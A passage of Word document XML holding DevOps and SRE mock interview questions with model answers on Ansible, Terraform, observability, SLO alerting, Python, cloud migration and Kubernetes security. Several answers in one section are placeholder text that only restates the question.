      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is Ansible, and how does its agentless, push-based model differ from Terraform or Puppet/Chef?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ansible connects to target hosts over SSH (or WinRM for Windows) and pushes configuration changes on demand, requiring no persistent agent installed on managed nodes, unlike Puppet/Chef's typical pull-based model where an agent on each host periodically checks in and applies configuration. This differs from Terraform's focus (provisioning and managing the lifecycle of infrastructure resources via cloud provider APIs) versus Ansible's focus (configuring the software and state inside already-provisioned systems), which is why the two are often used together rather than as competitors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you ensure Ansible playbooks are idempotent, and what happens when a task isn't naturally idempotent?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Ansible's built-in modules (which are designed to be idempotent - checking current state before making a change) rather than raw shell/command tasks wherever possible, since modules like `apt`, `file`, and `template` only make changes when the actual state differs from desired state. When a task genuinely isn't naturally idempotent (a raw shell command), add explicit state-checking logic (a `creates`/`removes` guard, or a conditional based on a prior check task's output) so re-running the playbook doesn't repeat the action unnecessarily or cause harm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you structure reusable Ansible roles for OS patching, configuration management, and application deployment across many teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure roles around single, well-defined responsibilities (a patching role, a base-hardening role, an app-deployment role) with clear, documented variables for customization, published to a shared role repository or Galaxy-style internal registry so teams consume tested, versioned roles rather than duplicating playbook logic. Compose team-specific playbooks by combining these shared roles with team-specific variables, keeping the reusable logic centralized while allowing legitimate per-team customization through variables rather than forked copies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you manage secrets in Ansible using Vault, and how would you rotate a vaulted secret without redistributing it manually?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store secrets encrypted with Ansible Vault, referenced in playbooks as normal variables so the encryption is transparent to the playbook logic itself, with the Vault password supplied at runtime via a password file or CI secret rather than committed anywhere. For rotation without manual redistribution, drive secret updates through the same automated pipeline that runs the playbooks - update the vaulted variable in source control, and let the next scheduled or triggered playbook run propagate the new secret to all managed hosts automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. When would you use Ansible instead of Terraform, and how would you combine them in the same pipeline, for example Terraform provisions and Ansible configures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Terraform for provisioning cloud infrastructure resources (VMs, networks, managed services) and Ansible for configuring the software and state inside those resources once they exist (installing packages, managing config files, deploying applications) - they solve different, complementary problems. A common pipeline pattern has Terraform provision VMs and output their IPs as a dynamic inventory source, which Ansible then consumes to configure those newly-created hosts as the next pipeline stage, keeping provisioning and configuration cleanly separated but automated end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you run Ansible playbooks against thousands of hosts efficiently, and what would you do about serial execution, forks, and failure handling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Increase the `forks` setting (default is low, 5) to run tasks against many more hosts in parallel, limited by your control node's resources and the target infrastructure's tolerance for concurrent connections. Use `serial:` to roll changes out in controlled batches when the change itself is risky (like a restart), even while forks handles the per-batch parallelism, and configure `max_fail_percentage` so a reasonable amount of individual host failures doesn't abort the entire run across thousands of hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you test Ansible roles and playbooks before running them in production, for example with Molecule or a CI pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Molecule to test roles in isolation against ephemeral containers or VMs, verifying both that the role applies successfully and that it's genuinely idempotent (running it twice produces no changes the second time), integrated into CI so every role change is tested automatically before merge. Run `ansible-lint` and a `--check --diff` dry-run against a staging inventory as an additional gate before any production run, so issues are caught in an isolated test environment rather than discovered live against real infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. You used Ansible for backup automation and disaster recovery. Walk me through how a playbook-driven DR runbook would work end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A DR playbook would orchestrate the full recovery sequence declaratively - provisioning or verifying replacement infrastructure, restoring data from the most recent validated backup, reconfiguring application settings for the recovery environment, and running post-restore validation checks - all as ordered, idempotent tasks rather than a manual checklist a human executes under pressure. Running this playbook regularly against a test environment (not just documenting it) is what actually proves the DR process works, since an untested runbook is a hope, not a validated recovery capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 47 - Today's Audio Interview Recap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How do you design reusable infrastructure modules? How do you handle reusable modules with strict state and credential isolation? How do approval workflows reduce the blast radius of infrastructure changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/IaC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design reusable infrastructure modules? How do you handle reusable modules with strict state and credential isolation? How do approval workflows reduce the blast radius of infrastructure changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Terraform change safety: When a Terraform plan shows a destroy and replace for a critical resource, what signals and guardrails do you rely on to decide whether to proceed, redesign, or block the change?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/IaC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Terraform change safety: When a Terraform plan shows a destroy and replace for a critical resource, what signals and guardrails do you rely on to decide whether to proceed, redesign, or block the change?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Incident response and observability: Customers report intermittent 5xx errors and P95 latency spikes. Walk me through your observability-driven triage sequence across metrics, logs, and traces. How do you isolate the failing dependency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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Incident response and observability: Customers report intermittent 5xx errors and P95 latency spikes. Walk me through your observability-driven triage sequence across metrics, logs, and traces. How do you isolate the failing dependency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. SLIs, SLOs, and alerting: How do you define customer-centric SLIs, SLOs, and actionable alerts? How do you filter noisy infrastructure signals? How do you catch both fast outages and slow degradation without paging on transient spikes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SRE/Reliability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SLIs, SLOs, and alerting: How do you define customer-centric SLIs, SLOs, and actionable alerts? How do you filter noisy infrastructure signals? How do you catch both fast outages and slow degradation without paging on transient spikes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Multi-window burn-rate alerting: Walk me through how you would implement multi-window burn-rate alerts for a 99.9% availability SLO. Which alert windows would you choose? Which alerts should page an on-call engineer immediately, and which should create a ticket for later investigation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SRE/Reliability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Multi-window burn-rate alerting: Walk me through how you would implement multi-window burn-rate alerts for a 99.9% availability SLO. Which alert windows would you choose? Which alerts should page an on-call engineer immediately, and which should create a ticket for later investigation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Tell me about yourself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure this in three parts and keep it under 90 seconds: a one-line professional summary (years of experience, core specialization), a brief walk through your career progression highlighting the roles and achievements most relevant to this job, and a closing line connecting your background to why you're excited about this specific opportunity. Avoid reciting your full resume chronologically - pick the thread that makes the strongest case for this particular role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Describe your experience with cloud platforms, Kubernetes, Terraform, and DevOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral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Describe your experience with cloud platforms, Kubernetes, Terraform, and DevOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you approach infrastructure changes in production to minimize customer impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Readiness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Readiness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approach infrastructure changes in production to minimize customer impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 48 - Today AI/Python/Cloud/SRE Recap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Today interview 2026-07-06 - AI engineering libraries: What Python libraries are most useful for AI Engineering nowadays?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AI/Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Group the answer by lifecycle. For model and data work: NumPy, pandas, scikit-learn, PyTorch, TensorFlow, Hugging Face Transformers, sentence-transformers, and XGBoost/LightGBM are common. For GenAI and RAG: LangChain, LlamaIndex, OpenAI/Anthropic/Vertex AI SDKs, FAISS/Chroma/Milvus/Pinecone clients, and evaluation tools like Ragas or DeepEval. For production AI engineering: FastAPI, Pydantic, MLflow, Airflow/Prefect, Kubernetes clients, OpenTelemetry, Prometheus clients, pytest, and cloud SDKs matter because the job is not only model building; it is packaging, serving, monitoring, evaluating, and operating AI systems safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Today interview 2026-07-06 - Python multiprocessing: Explain multiprocessing in Python. When should you use multiprocessing instead of multithreading?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multiprocessing runs work in separate OS processes, each with its own Python interpreter and memory space. It is useful for CPU-bound work because separate processes can run on multiple CPU cores and avoid the Global Interpreter Lock limiting Python bytecode execution. Use multithreading mostly for I/O-bound tasks such as network calls, file reads, or waiting on APIs. Use multiprocessing for CPU-heavy parsing, image processing, feature computation, encryption, compression, or batch transformations. The tradeoff is higher overhead: data must be serialized between processes, process startup is heavier than threads, and shared state needs queues, pipes, shared memory, or external storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Today interview 2026-07-06 - Python identity: Explain the difference between == and is in Python, using list examples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: == compares values; is compares object identity. With a = [1, 2], b = [1, 2], and c = a: a == b is True because both lists contain the same values; a is b is False because they are two different list objects; a is c is True because c points to the same list object as a. In interviews, mention that is should normally be used for identity checks such as x is None, not for normal value comparison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Today interview 2026-07-06 - AWS to GCP migration: Suppose a client has an application running on AWS. How would you migrate it to GCP across discovery, network, IAM, database, storage, CI/CD, validation, cutover, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with discovery: inventory services, dependencies, traffic, data size, RTO/RPO, compliance, and current IaC. Map AWS constructs to GCP equivalents: VPC/subnets/security groups to VPC/firewall rules, IAM roles to service accounts/IAM bindings, S3 to Cloud Storage, RDS to Cloud SQL/AlloyDB, EKS/ECS to GKE/Cloud Run, CloudWatch to Cloud Operations. Build landing zone, networking, IAM, logging, and CI/CD first. Migrate data with replication where possible, run parallel validation, deploy the app in GCP using immutable artifacts, test functional, performance, security, and DR paths, then cut over gradually through DNS, load balancer, or traffic splitting. Keep rollback ready by leaving AWS healthy until GCP has passed agreed success criteria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Today interview 2026-07-06 - Terraform IAM recovery: A Terraform change accidentally removed production Service Account permissions. How would you debug and recover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IAM Incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat it as an incident first: stop further applies, identify impacted service accounts and customer impact, and restore the minimum required permissions quickly from a known-good plan, previous state, audit logs, or a break-glass runbook. Check CI/CD logs, Terraform plan/apply output, state history, Git diff, provider change, and Cloud Audit Logs for SetIamPolicy or binding changes. If workloads are down, temporarily re-grant least-privilege roles manually or through an emergency Terraform patch, then validate services recover. After mitigation, fix the root cause: avoid authoritative IAM resources where additive bindings are safer, add policy-as-code checks, require plan review for IAM diffs, isolate state blast radius, and add tests that detect removal of critical bindings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Today interview 2026-07-06 - Multi-environment architecture: Design a multi-environment architecture for Dev, QA, and Prod.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use separate projects/accounts per environment, with clear folder hierarchy, separate IAM, separate Terraform state, separate service accounts, and environment-specific network boundaries. Dev can be lower-cost and more permissive for experimentation, QA/staging should mirror prod topology closely enough for reliable testing, and prod should have stronger approvals, HA, backup, monitoring, and access controls. Reuse the same Terraform modules and deployment templates across environments, changing only inputs such as sizing, replicas, CIDRs, retention, and approval gates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Today interview 2026-07-06 - Terraform state isolation: How would you isolate infrastructure and Terraform state across environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use separate state files/backends per environment, separate backend paths or workspaces with strict naming, separate credentials/service accounts, and ideally separate GCP projects or folders. Keep shared modules versioned separately from live environment code. Limit each state file's blast radius by domain: network, IAM, GKE, databases, and app layer should not all be in one huge state if ownership and risk differ. Enable state locking, versioning, audit logs, and least-privilege access to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Today interview 2026-07-06 - NetworkPolicy and admission control: How do you pair Kubernetes Network Policies with Admission Controllers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Network Policies enforce runtime traffic rules: which Pods can talk to which Pods or external destinations. Admission controllers enforce what is allowed to enter the cluster in the first place. Together, they create defense in depth: use Gatekeeper/Kyverno/Pod Security Admission to require labels, deny privileged Pods, require namespace ownership, and require default-deny plus approved allow policies; then use NetworkPolicies to enforce the actual east-west traffic boundaries. Admission prevents unsafe workloads or missing controls from being deployed, while NetworkPolicy limits blast radius if something is deployed or compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Today interview 2026-07-06 - Partial Terraform apply logs: During a production incident caused by a partially successful Terraform apply, what logs would you check first?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
